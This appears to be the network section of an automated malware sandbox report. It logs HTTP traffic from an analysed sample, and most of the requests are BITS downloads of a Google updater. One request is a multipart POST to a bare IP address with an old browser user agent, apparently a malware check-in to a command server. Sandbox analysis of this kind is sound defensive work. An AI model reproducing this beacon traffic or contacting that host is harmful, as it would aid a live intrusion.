X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://37.70.131.107/2eK2w0Nm/ 
POST /2eK2w0Nm/ HTTP/1.1
Referer: http://37.70.131.107/2eK2w0Nm/
Content-Type: multipart/form-data; boundary=---------------------------414466222086974
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 37.70.131.107
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=32358-49540
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=48db1fd2f6ede33c&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619774182&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=0-6840
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.